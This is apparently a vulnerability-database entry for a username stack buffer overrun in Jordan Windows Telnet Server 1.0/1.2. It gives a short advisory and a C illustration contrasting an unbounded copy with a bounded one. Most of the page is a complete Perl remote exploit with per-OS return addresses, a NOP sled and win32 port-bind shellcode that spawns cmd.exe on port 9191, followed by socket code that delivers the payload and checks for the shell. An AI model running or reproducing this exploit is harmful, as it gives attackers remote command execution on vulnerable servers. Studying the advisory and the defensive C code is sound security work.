Jordan Windows Telnet Server 1.0/1.2 – ‘Username’ Stack Buffer Overrun (1)
Vulnerability ID: 1054340
Vulnerability type: (not given)
Published: 2003-12-29
Updated: 2003-12-29
CVE number: N/A
CNNVD-ID: N/A
Platform: Windows
CVSS score: N/A

Vulnerability details
Details have not yet been disclosed.

Exploit (EXP)
source: http://www.securityfocus.com/bid/9316/info
Jordan Windows Telnet Server has been reported prone to a remote buffer overrun vulnerability. The issue has been reported to present itself when a username of excessive length is supplied to the Telnet server. Due to a lack of bounds checking, when this username is copied into an insufficiently sized stack-based buffer, data that exceeds the size of the buffer will overrun its bounds and corrupt adjacent memory. An attacker may exploit this condition to corrupt the saved instruction pointer of the vulnerable function.
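The bug class the advisory describes, shown as an added C example that is not code from the advisory, from the Jordan Telnet Server, or from the exploit below: the unbounded copy of a username into a fixed stack buffer beside a bounded replacement that rejects over-long input, plus a simple classifier a defender could run over a captured login line. USERNAME_MAX, the function names and the sample login buffer are assumptions constructed for the example; the real server's buffer size is not stated on the page.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Assumed username limit; the real server's buffer size is not stated in the advisory. */
#define USERNAME_MAX 32

/* Flags returned by classify_login() */
enum { LOGIN_OK = 0, LOGIN_TOO_LONG = 1, LOGIN_NONPRINTABLE = 2 };

/* The pattern the advisory describes: an unbounded copy of attacker-controlled
 * input into a fixed-size stack buffer. With input longer than USERNAME_MAX,
 * strcpy writes past buf and over the saved return address. Kept only so the
 * hardened version can be compared against it; call it only with short input. */
static int copy_username_unbounded(const char *username)
{
    char buf[USERNAME_MAX];
    strcpy(buf, username);          /* no length check: overflow on long input */
    return (int)strlen(buf);
}

/* Hardened form: measure first, refuse anything that does not fit together
 * with its terminator, and only then copy. Rejecting beats silent truncation,
 * which could map one account name onto another. Returns length or -1. */
int copy_username_bounded(const char *username, char *out, size_t outsz)
{
    size_t n = 0;
    while (n < outsz && username[n] != '\0')
        n++;                         /* bounded scan: never reads past outsz */
    if (n >= outsz)
        return -1;                   /* too long to fit with the NUL terminator */
    memcpy(out, username, n + 1);
    return (int)n;
}

/* Network-side check over a captured login line: a username longer than the
 * protocol should ever carry, or one containing non-printable bytes, is a
 * strong signal of this class of attack. */
int classify_login(const unsigned char *data, size_t len)
{
    int flags = LOGIN_OK;
    if (len > USERNAME_MAX)
        flags |= LOGIN_TOO_LONG;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = data[i];
        if (c == '\r' || c == '\n')
            continue;                /* line terminators are legitimate */
        if (!isprint(c))
            flags |= LOGIN_NONPRINTABLE;
    }
    return flags;
}

/* Constructed sample with the same layout as the payload in the exploit on
 * this page (512-byte filler, 4-byte address, 12-byte NOP sled, code), but with
 * harmless placeholder bytes instead of a real address or shellcode. */
size_t build_sample_overflow(unsigned char *buf, size_t bufsz)
{
    size_t n = 0;
    if (bufsz < 512 + 4 + 12 + 4)
        return 0;
    memset(buf + n, 'A', 512); n += 512;            /* filler up to the saved return address */
    memcpy(buf + n, "BBBB", 4); n += 4;             /* placeholder for the overwritten address */
    memset(buf + n, 0x90, 12); n += 12;             /* NOP sled, as in the exploit */
    memcpy(buf + n, "\xCC\xCC\xCC\xCC", 4); n += 4; /* int3 placeholders instead of shellcode */
    return n;
}

int main(void)
{
    char out[USERNAME_MAX];
    unsigned char sample[1024];
    size_t len = build_sample_overflow(sample, sizeof sample);

    printf("short name, unbounded copy: %d\n", copy_username_unbounded("operator"));
    printf("short name, bounded copy:   %d\n", copy_username_bounded("operator", out, sizeof out));
    printf("overflow, bounded copy:     %d (rejected)\n",
           copy_username_bounded((const char *)sample, out, sizeof out));
    printf("classify flags:             %d\n", classify_login(sample, len));
    return 0;
}
```

The bounded version scans at most outsz bytes before deciding, so an unterminated network buffer is safe to pass to it; the classifier flags the constructed sample on both length and the non-printable sled bytes, which is the kind of two-signal rule that keeps false positives from ordinary long usernames low.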
#!/usr/bin/perl
## __________ ___ ___
## ______ __ __ ______/ |
## | _/ | / ___/ _
## | | | /___ \ /
## |____|_ /____//____ >___|_ /
## / / /
##
## Jordan's Windows Telnet server version 1.0 remote exploit
## spawn cmd.exe on port 9191
## coded by 1dt.w0lf ... yeap just for fun and drill =)
## this code just C -> Perl port
## based on http://packetstormsecurity.nl/0401-exploits/wts_bo.c by fiNis > fiNis[at]bk.ru
##
## !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
##
## Run exploit under command prompt (Windows) or shell (*nix)!
##
## C:>r57jwt.pl 127.0.0.1 23 1
## [~] server : 127.0.0.1
## [~] port : 23
## [~] target : 1
## [~] connecting to host...
## [+] connected
## [~] sending shellcode
## [+] shellcode sent
## [~] trying to connect on port 9191
## [+] shell spawned on port 9191 ... you are lucky =)
##
## !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
use strict;
use warnings;
use IO::Socket;

if (@ARGV < 3)
{
    print "\n";
    print "Jordan's Windows Telnet server version 1.0 exploit\n";
    print "usage: $0 <host> <port> <target>\n";
    print "\ntargets:\n";
    print " 1 - 0x773C4540 - winXP sp0\n";
    print " 2 - 0x77fb59cc - winXP sp1\n";
    print " 3 - 0x77e3cb4c - Windows 2000 SP1\n";
    print " 4 - 0x77e2492b - Windows 2000 SP2\n";
    print " 5 - 0x77e2afc5 - Windows 2000 SP3\n";
    print " 6 - 0x77e14c29 - Windows 2000 SP4\n";
    print " 7 - 0x77f0eac3 - Windows NT sp6\n";
    print " 8 - 0x7fdabfa9 - Windows 98 SE\n";
    print " 9 - 0xAAAAAAAA - dos\n";
    print "\n";
    exit(1);
}

my $server = $ARGV[0];
my $port   = $ARGV[1];
my $target = $ARGV[2];
my $ret;

## targets: address of a jmp esp in a system DLL for each OS/service pack ##
if($target==1){$ret = 0x773C4540;} # winXP sp0 shell32.dll jmp esp
if($target==2){$ret = 0x77fb59cc;} # winXP sp1
if($target==3){$ret = 0x77e3cb4c;} # Windows 2000 SP1
if($target==4){$ret = 0x77e2492b;} # Windows 2000 SP2
if($target==5){$ret = 0x77e2afc5;} # Windows 2000 SP3
if($target==6){$ret = 0x77e14c29;} # Windows 2000 SP4
if($target==7){$ret = 0x77f0eac3;} # Windows NT sp6
if($target==8){$ret = 0x7fdabfa9;} # Windows 98 SE
if($target==9){$ret = 0xAAAAAAAA;} # dos
die "[-] unknown target: $target\n" unless defined $ret;

print "\n";
print "[~] server : $server\n";
print "[~] port : $port\n";
print "[~] target : $target\n";
print "\n";

## 12-byte NOP sled placed between the return address and the shellcode
my $nop_zone="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";

## 512 bytes jff code ... little lolz shit (printable filler that reaches the saved return address)
my $jff_code="\x72\x35\x37\x2E\x62\x6C\x61\x68\x2E\x62\x6C\x61\x68\x2E\x68\x61\x68\x61\x5F\x63\x6F\x64\x65\x2E\x6A\x75\x73".
"\x74\x2E\x66\x6F\x72\x2E\x66\x75\x6E\x2E\x2E\x2E\x74\x68\x69\x73\x2E\x69\x73\x2E\x6E\x6F\x74\x2E\x6E\x65\x65".
"\x64\x2E\x66\x6F\x72\x2E\x67\x6F\x6F\x64\x2E\x77\x6F\x72\x6B\x2E\x2E\x2E\x62\x75\x74\x2E\x2E\x2E\x2E\x77\x68".
"\x79\x2E\x6E\x6F\x74\x3F\x2E\x2E\x63\x72\x65\x61\x74\x65\x64\x2E\x62\x79\x2E\x31\x64\x74\x2E\x77\x30\x6C\x66".
"\x2E\x31\x33\x2E\x30\x31\x2E\x32\x30\x30\x34\x2E\x66\x6F\x72\x2E\x6C\x69\x74\x74\x6C\x65\x2E\x6C\x61\x6D\x65".
"\x2E\x78\x70\x6C\x6F\x69\x74\x2E\x2E\x79\x65\x61\x70\x2E\x2E\x74\x68\x69\x73\x2E\x65\x78\x70\x6C\x6F\x69\x74".
"\x2E\x66\x6F\x72\x2E\x65\x64\x75\x63\x61\x74\x69\x6F\x6E\x73\x2E\x6F\x6E\x6C\x79\x2E\x2E\x2E\x66\x75\x6C\x6C".
"\x79\x2E\x77\x6F\x72\x6B\x2E\x2E\x2E\x74\x65\x73\x74\x65\x64\x2E\x6F\x6E\x2E\x77\x69\x6E\x78\x70\x2E\x2E\x77".
"\x69\x74\x68\x6F\x75\x74\x2E\x61\x6E\x79\x2E\x73\x65\x72\x76\x69\x63\x65\x2E\x70\x61\x63\x6B\x73\x2E\x2E\x63".
"\x61\x6E\x2E\x77\x6F\x72\x6B\x2E\x6F\x6E\x2E\x6F\x74\x68\x65\x72\x2E\x76\x65\x72\x73\x69\x6F\x6E\x73\x2E\x6F".
"\x66\x2E\x6D\x65\x6C\x63\x6F\x24\x6F\x66\x74\x2E\x77\x69\x6E\x64\x6F\x77\x24\x2E\x2E\x62\x75\x74\x2E\x69\x27".
"\x6D\x2E\x64\x6F\x6E\x27\x74\x2E\x68\x61\x76\x65\x2E\x61\x6E\x79\x2E\x74\x69\x6D\x65\x2E\x66\x6F\x72\x2E\x74".
"\x65\x73\x74\x2E\x69\x74\x2E\x2E\x3D\x28\x2E\x2E\x77\x65\x6C\x6C\x2E\x2E\x2E\x77\x65\x6C\x6C\x2E\x2E\x2E\x77".
"\x65\x6C\x6C\x2E\x2E\x2E\x76\x69\x73\x69\x74\x2E\x6F\x75\x72\x2E\x73\x69\x74\x65\x3A\x68\x74\x74\x70\x3A\x2F".
"\x2F\x72\x73\x74\x2E\x76\x6F\x69\x64\x2E\x72\x75\x2E\x2E\x6F\x72\x2E\x2E\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77".
"\x77\x2E\x72\x73\x74\x65\x61\x6D\x2E\x72\x75\x2E\x2E\x2E\x77\x65\x2E\x67\x6C\x61\x64\x2E\x74\x6F\x2E\x73\x65".
"\x65\x2E\x79\x6F\x75\x2E\x2E\x2E\x2E\x61\x6E\x64\x2E\x73\x6F\x72\x72\x79\x2E\x66\x6F\x72\x2E\x6D\x79\x2E\x65".
"\x6E\x67\x6C\x69\x73\x68\x2E\x2E\x3D\x28\x2E\x2E\x2E\x2E\x2E\x2E\x2E\x61\x6E\x64\x2E\x2E\x2E\x2E\x2E\x48\x41".
"\x56\x45\x2E\x41\x2E\x4E\x49\x43\x45\x2E\x44\x41\x59\x2E\x2E\x2E\x2E\x2E\x2E\x2E\x65\x6E\x6A\x6F\x79\x2E";

## 484 bytes win32 portbind shellcode, spawn cmd.exe on port 9191
my $shell_code="\xEB\x03\x5D\xEB\x05\xE8\xF8\xFF\xFF\xFF\x8B\xC5\x83\xC0\x11\x33\xC9\x66\xB9\xC9\x01\x80\x30\x88\x40\xE2\xFA".
"\xDD\x03\x64\x03\x7C\x09\x64\x08\x88\x88\x88\x60\xC4\x89\x88\x88\x01\xCE\x74\x77\xFE\x74\xE0\x06\xC6\x86\x64\x60\xD9\x89".
"\x88\x88\x01\xCE\x4E\xE0\xBB\xBA\x88\x88\xE0\xFF\xFB\xBA\xD7\xDC\x77\xDE\x4E\x01\xCE\x70\x77\xFE\x74\xE0\x25\x51\x8D\x46".
"\x60\xB8\x89\x88\x88\x01\xCE\x5A\x77\xFE\x74\xE0\xFA\x76\x3B\x9E\x60\xA8\x89\x88\x88\x01\xCE\x46\x77\xFE\x74\xE0\x67\x46".
"\x68\xE8\x60\x98\x89\x88\x88\x01\xCE\x42\x77\xFE\x70\xE0\x43\x65\x74\xB3\x60\x88\x89\x88\x88\x01\xCE\x7C\x77\xFE\x70\xE0".
"\x51\x81\x7D\x25\x60\x78\x88\x88\x88\x01\xCE\x78\x77\xFE\x70\xE0\x2C\x92\xF8\x4F\x60\x68\x88\x88\x88\x01\xCE\x64\x77\xFE".
"\x70\xE0\x2C\x25\xA6\x61\x60\x58\x88\x88\x88\x01\xCE\x60\x77\xFE\x70\xE0\x6D\xC1\x0E\xC1\x60\x48\x88\x88\x88\x01\xCE\x6A".
"\x77\xFE\x70\xE0\x6F\xF1\x4E\xF1\x60\x38\x88\x88\x88\x01\xCE\x5E\xBB\x77\x09\x64\x7C\x89\x88\x88\xDC\xE0\x89\x89\x88\x88".
"\x77\xDE\x7C\xD8\xD8\xD8\xD8\xC8\xD8\xC8\xD8\x77\xDE\x78\x03\x50\xDF\xDF\xE0\x8A\x88\xAB\x6F\x03\x44\xE2\x9E\xD9\xDB\x77".
"\xDE\x64\xDF\xDB\x77\xDE\x60\xBB\x77\xDF\xD9\xDB\x77\xDE\x6A\x03\x58\x01\xCE\x36\xE0\xEB\xE5\xEC\x88\x01\xEE\x4A\x0B\x4C".
"\x24\x05\xB4\xAC\xBB\x48\xBB\x41\x08\x49\x9D\x23\x6A\x75\x4E\xCC\xAC\x98\xCC\x76\xCC\xAC\xB5\x01\xDC\xAC\xC0\x01\xDC\xAC".
"\xC4\x01\xDC\xAC\xD8\x05\xCC\xAC\x98\xDC\xD8\xD9\xD9\xD9\xC9\xD9\xC1\xD9\xD9\x77\xFE\x4A\xD9\x77\xDE\x46\x03\x44\xE2\x77".
"\x77\xB9\x77\xDE\x5A\x03\x40\x77\xFE\x36\x77\xDE\x5E\x63\x16\x77\xDE\x9C\xDE\xEC\x29\xB8\x88\x88\x88\x03\xC8\x84\x03\xF8".
"\x94\x25\x03\xC8\x80\xD6\x4A\x8C\x88\xDB\xDD\xDE\xDF\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D\xF0\x8B\x5D\x03\xC2\x90\x03".
"\xD2\xA8\x8B\x55\x6B\xBA\xC1\x03\xBC\x03\x8B\x7D\xBB\x77\x74\xBB\x48\x24\xB2\x4C\xFC\x8F\x49\x47\x85\x8B\x70\x63\x7A\xB3".
"\xF4\xAC\x9C\xFD\x69\x03\xD2\xAC\x8B\x55\xEE\x03\x84\xC3\x03\xD2\x94\x8B\x55\x03\x8C\x03\x8B\x4D\x63\x8A\xBB\x48\x03\x5D".
"\xD7\xD6\xD5\xD3\x4A\x8C\x88";

## payload layout: filler | return address (little-endian) | NOP sled | shellcode
my $pack_ret = pack('l', $ret);
my $buffa = '';
$buffa .= $jff_code;
$buffa .= $pack_ret;
$buffa .= $nop_zone;
$buffa .= $shell_code;

print "[~] connecting to host...\n";
my $socket = IO::Socket::INET->new( PeerAddr => $server, PeerPort => $port, Proto => 'tcp') || die "[-] connect failed\n";
print "[+] connected\n";
sleep 1;
print "[~] sending shellcode\n";
print $socket "$buffa";
sleep 1;
print "[+] shellcode sent\n";
close($socket);

print "[~] trying to connect on port 9191\n";
$socket = IO::Socket::INET->new( PeerAddr => $server, PeerPort => "9191", Proto => 'tcp') || die "[-] damn ... connect to spawn shell failed\n";
close($socket);
print "[+] shell spawned on port 9191 ... you are lucky =)\n";